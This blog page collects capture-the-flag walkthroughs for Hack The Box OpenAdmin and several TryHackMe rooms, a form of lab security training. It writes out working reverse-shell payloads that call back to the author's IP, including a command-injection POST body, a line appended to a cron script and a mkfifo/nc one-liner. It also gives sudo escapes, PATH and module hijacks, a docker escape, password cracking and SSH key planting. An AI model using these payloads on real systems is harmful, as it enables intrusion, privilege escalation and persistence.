Tag: Linux

Hack The Box solution: OpenAdmin ~ 10.10.10.171

Enumeration

Scan open ports with RustScan:

Use dirsearch:

python3 dirsearch.py -u http://10.10.10.171/

Access: http://10.10.10.171/ona/

We see that: “Your version = v18.1.1”

Search in Exploit Database, we have OpenNetAdmin 18.1.1 – Command Injection Exploit (Metasploit).

Foothold

Send POST request to the server with the data:

xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo+'begin';id;echo+'end';&xajaxargs[]=ping

And the command executed.

Stand a netcat listener in our machine:

nc -lvnp 1234

Call to our listener with:

xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo+'begin';bash+-c+'bash+-i+>%26+/dev/tcp/10.10.16.11/1234+0>%261';echo+'end';&xajaxargs[]=ping

There are 2 users:

We will get jimmy‘s password in /opt/ona/www/local/config/database_settings.inc.php

Spawn a TTY shell with:

python3 -c 'import pty;pty.spawn("/bin/bash");'

Change to jimmy:

su jimmy

Find jimmy‘s files with:

find / -type f -user jimmy 2>/dev/null | grep -v '/proc/'

We found 3 files:

Read main.php

index.php

So, we need to login as jimmy and we will have joanna‘s ssh private key.

Check local open ports with:

(netstat -punta || ss --ntpu)

So I think internal is hosted in port 52846.

And we can easily get the key with:

curl localhost:52846/main.php -H 'Session: username=jimmy'

Save the key to a file named id_rsa.

We will use JohntheRipper ssh2john.py to crack the private key.

python3 ssh2john.py id_rsa > hash

Next, we use JohntheRipper and rockyou.txt.

john-the-ripper -w=rockyou.txt hash

Then, we can connect to ssh:

chmod 600 id_rsa
ssh -i id_rsa joanna@10.10.10.171

And we have the key.

Privilege Escalation

Check what we can do with:

sudo -l

Follow steps in GTFOBins, we can easily get root.

sudo nano /opt/priv
^R^X
reset; sh 1>&0 2>&0

TryHackMe solution: Linux Agency

Link: https://tryhackme.com/room/linuxagency

Task 3: Linux Fundamentals

#1 “What is the mission1 flag?

Connect to ssh and you have the the flag.

#2 “What is the mission2 flag?

Use ls in /home/mission1

#3 “What is the mission3 flag?

Read flag in /home/mission2

#4 “What is the mission4 flag?
strings flag.txt
#5 “What is the mission5 flag?
#6 “What is the mission6 flag?
#7 “What is the mission7 flag?
#8 “What is the mission8 flag?
#9 “What is the mission9 flag?
find / -type f -user mission8 2>/dev/null | grep -v proc
#10 “What is the mission10 flag?
cat rockyou.txt | grep mission10
#11 “What is the mission11 flag?
find . -type f
#12 “What is the mission12 flag?

Read .bashrc

cat .bashrc

Decode the string with Base64 decoder.

fTAyN2E5Zjc2OTUzNjQ1MzcyM2NkZTZkMzNkMWE5NDRmezIxbm9pc3NpbQo=

Then you can use Best Reverse String / Text tool.

#13 “What is the mission13 flag?
chmod +r flag.txt
cat flag.txt
#14 “What is the mission14 flag?
bWlzc2lvbjE0e2Q1OThkZTk1NjM5NTE0Yjk5NDE1MDc2MTdiOWU1NGQyfQo=

Decode the string with Base64 decoder.

#15 “What is the mission15 flag?
01101101 01101001 01110011 01110011 01101001 01101111 01101110 00110001 00110101 01111011 01100110 01100011 00110100 00111001 00110001 00110101 01100100 00111000 00110001 00111000 01100010 01100110 01100001 01100101 01100110 01100110 00110000 00110001 00110001 00111000 00110101 01100011 00110011 00110101 00110100 00110111 01100110 00110010 00110101 00110101 00111001 00110110 01111101

Decode the string with Binary to Text Translator.

#16 “What is the mission16 flag?
6D697373696F6E31367B38383434313764343030333363346332303931623434643763323661393038657D

Decode the string with Hex to Text.

#17 “What is the mission17 flag?
chmod +x flag
./flag
#18 “What is the mission18 flag?

You can run Java with Online Java Compiler.

#19 “What is the mission19 flag?
ruby flag.rb
#20 “What is the mission20 flag?

You can run C with Online C Compiler.

#21 “What is the mission21 flag?
python3 flag.py
#22 “What is the mission22 flag?

Read .bashrc

cat .bashrc

Decode the string with Base64 decoder.

fWZhYTk0ZDI0YjQ4OTZlMmE2ZGU5ODgwYmU0N2FhYzQyezIybm9pc3NpbQo=

Then you can use Best Reverse String / Text tool.

#23 “What is the mission23 flag?

We will use python to run system commands.

import os
os.system('cd && ls -la');
os.system('cd && cat flag.txt');
#24 “What is the mission24 flag?

We have a message here, the hint is ‘hosts‘ and ‘curly‘.

So we read /etc/hosts and found a host, use curl with this host.

cat /etc/hosts
curl mission24.com | grep mission
#25 “What is the mission25 flag?

We found an execute file, run this and we have:

Use ltrace:

ltrace ./bribe

So, we have to add money to ‘pocket‘ and add value to ‘init‘.

export pocket=money
export init=1
./bribe
#26 “What is the mission26 flag?

We have to use commands with the path to execute:

/bin/ls
/bin/cat flag.txt
#27 “What is the mission27 flag?

We have an image:

strings flag.jpg | grep mission
#28 “What is the mission28 flag?

We have a .gz file, extract it and read the flag:

gzip -d flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
strings flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png | grep mission
#29 “What is the mission29 flag?

We will use ruby to run system commands.

system('cd && ls -la');
system('cd && cat txt.galf');

Then you can use Best Reverse String / Text tool.

#30 “What is the mission30 flag?

The hint is:

“Maybe!! You need to know how to set authentication on websites.”

Do a little research and I found .htpasswd

cat .htpasswd
#31 “What is viktor’s Flag?

The hint is:

“You will need a time machine used by programmers.

So we think about logs.

Task 4: Privilege Escalation

#1 “What is dalia’s flag?

Check crontab:

cat /etc/crontab

We see that dalia executes /opt/scripts/47.sh every minute, so we write to this file.

Stand a netcat listener in our machine:

nc -lvnp 1234

Write to /opt/scripts/47.sh

echo 'bash -i >& /dev/tcp/10.6.63.158/1234 0>&1' >> /opt/scripts/47.sh

Wait a little bit and we have the shell:

#2 “What is silvio’s flag?

Check what we can do with:

sudo -l

Follow steps in GTFOBins, we can change to silvio.

TF=$(mktemp -u)
sudo -u silvio zip $TF /etc/hosts -T -TT 'sh #'
#3 “What is reza’s flag?

Use:

sudo -l

Spawn a TTY shell with:

python3 -c 'import pty; pty.spawn("/bin/bash");'

Then change to reza with:

sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p help
#4 “What is jordan’s flag?

Use:

sudo -l

We can run a python file as jordan but we cannot read or write to this file. Try to run it:

sudo -u jordan /opt/scripts/Gun-Shop.py

So, we will write a module for this file to import.

cd /tmp
echo 'import os' > shop.py
echo 'os.system("/bin/bash");' >> shop.py

And change to jordan with:

sudo -u jordan PYTHONPATH=/tmp/ /opt/scripts/Gun-Shop.py

Then you can use Best Reverse String / Text tool.

#5 “What is ken’s flag?

Use:

sudo -l
sudo -u ken less /etc/profile
!/bin/sh
#6 “What is sean’s flag?

Use:

sudo -l
sudo -u sean vim -c ':!/bin/sh'

sean‘s flag is in /var/log/syslog.bak

cat /var/log/syslog.bak | grep sean
#7 “What is penelope’s flag?

Next to sean‘s flag, there is a base64 string:

VGhlIHBhc3N3b3JkIG9mIHBlbmVsb3BlIGlzIHAzbmVsb3BlCg==

Decode the string with Base64 decoder, we have penelope‘s password.

#8 “What is maya’s flag?

In penelope‘s home, there is a maya‘s file and its SUID bit is set, so we use it to read file in /home/maya.

./base64 /home/maya/flag.txt

Decode the string.

#9 “What is robert’s Passphrase?

We have a message:

We will get robert‘s id_rsa.

In our machine, we will use JohntheRipper to crack the private key, we will use ssh2john.py.

python3 ssh2john.py id_rsa > hash

Next, we use JohntheRipper and rockyou.txt.

This link tells us how to install and use JohntheRipper.

john-the-ripper -w=rockyou.txt hash
#10 “What is user.txt?

We cannot change to robert. Check open ports:

ss -lntu

Port 2222 is open, so we think about connect to ssh server.

ssh robert@127.0.0.1 -p 2222 -i id_rsa

Use the Passphrase we found before.

Check what we can do with:

sudo -l

We can get root with:

sudo -u#-1 /bin/bash
#11 “What is root.txt?

Use:

cat /proc/1/cgroup

We are inside a docker container, we will follow steps in Mounted docker socket to breakout of docker.

find / -name docker.sock 2>/dev/null
docker images

But there is an error:

So, we will find docker:

find / -name '*docker*' 2>/dev/null

And we found: /tmp/docker

/tmp/docker images
/tmp/docker run -it -v /:/host/ b5f279024ce0 chroot /host/ bash

And we finished the room.

TryHackMe solution: Anonymous

Link: https://tryhackme.com/room/anonymous

#1 “Enumerate the machine.  How many ports are open?
#2 “What service is running on port 21?
#3 “What service is running on ports 139 and 445?

Scan open port with RustScan:

rustscan -a 10.10.205.6 -- -sCV
#4 “There’s a share on the user’s computer.  What’s it called?

We check for available shares on the host with smbclient.

smbclient -N -L \\\\10.10.205.6\\
#5 “user.txt

Anonymous FTP login is allowed, so we connect to ftp:

ftp 10.10.205.6

with:

username: anonymous
password: anonymous

Get these files.

Edit file clean.sh into

And put it to the server.

append clean.sh

Stand a netcat listener in our machine:

nc -lvnp 1234

Wait a little and we have the user shell.

#6 “root.txt

Find SUID files with:

find / -type f -perm -u=s 2>/dev/null

And we found: /usr/bin/env

We can get root with:

env /bin/sh -p

And we found the flag.

TryHackMe solution: VulnNet: Internal

Link: https://tryhackme.com/room/vulnnetinternal

#1 “What is the services flag? (services.txt)

Use nmap to find open ports:

nmap -sCV 10.10.127.171

We check for available shares on the host with smbclient.

We can install with:

sudo apt-get install smbclient

-N, --no-pass,   Don't ask for a password
-L, --list=HOST, Get a list of shares available on a host

smbclient -N -L \\\\10.10.127.171\\

There is a share named shares, and we access it with:

smbclient -N \\\\10.10.127.171\\shares

And we have services.txt.

#2 “What is the internal flag? (“internal flag”)

View mount with:

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.127.171

We will create a new directory and mount data to it.

mkdir conf
mount -t nfs 10.10.127.171:/opt/conf conf

We will have a password for redis in conf/redis/redis.conf.

cat conf/redis/redis.conf | grep "pass"

Install redis-tools with:

sudo apt install redis-tools

And connect to redis.

redis-cli -h 10.10.127.171 -a 'B65Hx562F@ggAZ@F'

Get the flag with:

get "internal flag"
#3 “What is the user flag? (user.txt)

Get key authlist.

lrange authlist 0 10

And we have base64 strings.

QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==

Decode it, we have the authorization for rsync.

Enumerate rsync.

rsync -av --list-only rsync://10.10.127.171:873

Create new directory and copy all files to it.

mkdir rsync
rsync -av rsync://rsync-connect@10.10.127.171:873/files ./rsync

And we have user.txt and the username “sys-internal“.

#4 “What is the root flag? (root.txt)

We will upload a ssh key to the server with rsync:

ssh-keygen -f id_rsa
rsync -ahv ./id_rsa.pub rsync://rsync-connect@10.10.127.171:873/files/sys-internal/.ssh/authorized_keys --inplace --no-o --no-g

Connect to ssh:

ssh sys-internal@10.10.127.171 -i id_rsa

This room is vulnerable to CVE-2021-3493 and we can exploit it with this.

Download exploit.c and host a http server on our machine:

python3 -m http.server

In the target machine, we run:

cd /tmp
wget http://10.6.63.158:8000/exploit.c
gcc exploit.c -o exploit
./exploit

And we get /root/root.txt.

TryHackMe solution: Overpass 2 – Hacked

Link: https://tryhackme.com/room/overpass2hacked

Task 1: Forensics – Analyse the PCAP

#1 “What was the URL of the page they used to upload a reverse shell?

Download the pcapng file, open it with Wireshark, follow TCP Stream. The answer is in Stream 0.

#2 “What payload did the attacker use to gain access?

The answer is in Stream 1.

#3 “What password did the attacker use to privesc?
#4 “How did the attacker establish persistence?

The answer is in Stream 3.

#5 “Using the fasttrack wordlist, how many of the system passwords were crackable?

Save the data of /etc/shadow in Stream 3 to a file named “shadow“.

Download the fasttrack wordlist.

Next, we use JohntheRipper to crack the password.

This link tells us how to install and use JohntheRipper.

john-the-ripper shadow -w=fasttrack.txt

Task 2: Research – Analyse the code

#1 “What’s the default hash for the backdoor?
#2 “What’s the hardcoded salt for the backdoor?

Access the github link in Stream 3 and read main.go to get the answers.

#3 “What was the hash that the attacker used? – go back to the PCAP for this!

The answer is in Stream 3.

#4 “Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

Copy the hash and the salt to a file with the format is:

password$salt

And use JohntheRipper and rockyou.txt to crack the hash.

john-the-ripper hash --format='dynamic=sha512($p.$s)' -w=rockyou.txt

Task 3: Attack – Get back in!

#1 “The attacker defaced the website. What message did they leave as a heading?

Access the webpage: http://10.10.175.129/

#2 “What’s the user flag?

In Stream 3, we found that we can connect to ssh through port 2222.

ssh james@10.10.140.222 -p 2222

Use the password we just found in task 2.

#3 “What’s the root flag?

The hint is: “Did the attacker leave a quick way for them to get root again without a password?

This is talked about a file named “.suid_bash” in /home/james and we can get root with:

./.suid_bash -p

We can get the explanation here.

TryHackMe solution: LazyAdmin

Link: https://tryhackme.com/room/lazyadmin

#1 “What is the user flag?

First, use nmap:

nmap -sCV 10.10.52.134

Next, use dirsearch:

python3 dirsearch.py -u 10.10.52.134

And we found: http://10.10.52.134/content/

Do a little research and we know that there is 2 vulnerabilities that we can use to exploit this machine.
– SweetRice 1.5.1 – Backup Disclosure
– SweetRice 1.5.1 – Arbitrary File Upload

Backup Disclosure

We can access to all mysql backup and download them from this directory:

http://10.10.52.134/content/inc/mysql_backup/

Download sql file and open it, we get a credential.

username: manager
password: 42f749ade7f9e195bf475f37a44cafcb

Crack the password with CrackStation and we get the password.

And we can login to the server in:

http://10.10.52.134/content/as/
Arbitrary File Upload

This web is vulnerable in Media Center.

We try to upload a php-reverse-shell.php to the server (after changing the IP) and compress the file into zip.

Select “Extract zip archive?”.

Stand up a netcat listener on port 1234.

nc -lvnp 1234

Click the file that we uploaded.

And we get the shell.

We can found the flag at /home/itguy/user.txt.

#2 “What is the root flag?

Spawn a tty shell with:

python3 -c 'import pty; pty.spawn("/bin/sh");'

See what we can do with:

sudo -l
cat /home/itguy/backup.pl
cat /etc/copy.sh

Then, we will edit /etc/copy.sh to call to our machine.

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.63.158 1235 >/tmp/f' > /etc/copy.sh

Stand up a netcat listener on port 1235.

nc -lvnp 1235

Run that file as root.

sudo /usr/bin/perl /home/itguy/backup.pl

And we found the flag.

TryHackMe solution: RootMe

Link: https://tryhackme.com/room/rrootme

Task 2: Reconnaissance

#1 “Scan the machine, how many ports are open?
#2 “What version of Apache is running?
#3 “What service is running on port 22?
nmap -sCV 10.10.240.224
#4 “Find directories on the web server using the GoBuster tool.
#5 “What is the hidden directory?

We can use this common.txt.

gobuster dir -u http://10.10.240.224/ -w common.txt

Task 3: Getting a shell

Find a form to upload and get a reverse shell, and find the flag.

Access: http://10.10.240.224/panel/

We try to upload a php-reverse-shell.php to the server (after changing the IP).

But php is not allowed. Rename our shell to php-reverse-shell.phtml and we can upload it now.

#1 “user.txt

Stand up a netcat listener on port 1234.

nc -lvnp 1234

Trigger our shell with: http://10.10.240.224/uploads/php-reverse-shell.phtml

Find user.txt with:

find -type f -name "user.txt" 2>/dev/null

Task 4: Privilege escalation

#1 “Search for files with SUID permission, which file is weird?

Use this command:

find / -perm -u=s -type f 2>/dev/null
#2 “Find a form to escalate your privileges.
/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Explanation.

#3 “root.txt

We found root.txt in /root.

TryHackMe solution: Bounty Hacker

Link: https://tryhackme.com/room/cowboyhacker

#1 “Who wrote the task list?

Find open ports on the machine.

nmap -sCV 10.10.92.168

Anonymous FTP login is allowed so I try to login:

ftp 10.10.92.168

Read task.txt and we have the answer.

#2 “What service can you bruteforce with the text file found?

Port 22 is open, so …

#3 “What is the users password?

Use hydra and the text file to brute force.

hydra -l lin -P locks.txt 10.10.92.168 ssh
#4 “user.txt

After finding the password, login to ssh and get the flag.

ssh lin@10.10.92.168
#5 “root.txt

Use:

sudo -l
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

And we found root.txt.

TryHackMe solution: Wonderland

Link: https://tryhackme.com/room/wonderland

#1 “Obtain the flag in user.txt

First, we use:

nmap -sCV 10.10.26.131

to find open ports in the machine.

Next, we can use dirsearch to enumerate.

python3 dirsearch.py -u 10.10.26.131

And we found folder /r.

Continually using dirsearch to enumerate several times.

python3 dirsearch.py -u 10.10.26.131/r

Finally, we will found the door we need.

View this page source and we have a username and password which we will use to access ssh.

ssh alice@10.10.26.131

We found root.txt in /home/alice but cannot open it.

There is a hint.

So, I think that user.txt will be in /root.

cat /root/user.txt
#2 “Escalate your privileges, what is the flag in root.txt?

#rabbit

Find what alice can do with:

sudo -l

So alice can run python3.6 as rabbit.

cat walrus_and_the_carpenter.py
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.

...

"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

Then we will create a new random.py for this program to import.

echo 'import os' > random.py
echo 'os.system("/bin/sh")' >> random.py

Run this file as rabbit.

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

#hatter

There is a file named teaParty in /home/rabbit. Run this file, we get.

There is a line in teaParty.

/bin/echo -n 'Probably by ' && date --date='next hour' -R

This file call the script date, so we will create a new date for this file to call.

echo '#!/bin/bash' > /tmp/date
echo '/bin/bash' >> /tmp/date
chmod +x /tmp/date

Make sure that the system will call our date.

export PATH=/tmp:$PATH

Run teaParty again to get hatter‘s shell.

#root

There is a password file in /home/hatter, we will use this password to access ssh as hatter.

ssh hatter@10.10.26.131

We will use getcap to examine file capabilities.

-r  enables recursive search
getcap -r / 2>/dev/null

/usr/bin/perl have cap_setuid+ep.

We will get root’s shell with:

/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

And we get the root’s flag.

cat /home/alice/root.txt

TryHackMe solution: Pickle Rick

Link: https://tryhackme.com/room/picklerick

#1 “What is the first ingredient Rick needs?

Frist, we go to the web.

View page source and we found:

Then I guess we need to find a login form.

Let’s use dirsearch:

python3 dirsearch.py -u http://10.10.227.165/

Then we go to robots.txt, there is a string and I guess that it is the password we need.

Use the username and password to login in /login.php

We then access a page where we can run commands.

Let’s run ls:

I tried cat command but

Then, I use:

strings Sup3rS3cretPickl3Ingred.txt

and found the first ingredient.

#2 “Whats the second ingredient Rick needs?
strings clue.txt

Then, we need to look around the file system.

cd /home; ls
cd /home/rick; ls
strings '/home/rick/second ingredients'

And we found the second ingredient.

#3 “Whats the final ingredient Rick needs?

Continue looking around, we use:

sudo -l /root

Finally:

sudo strings /root/3rd.txt
Design a site like this with WordPress.com
Get started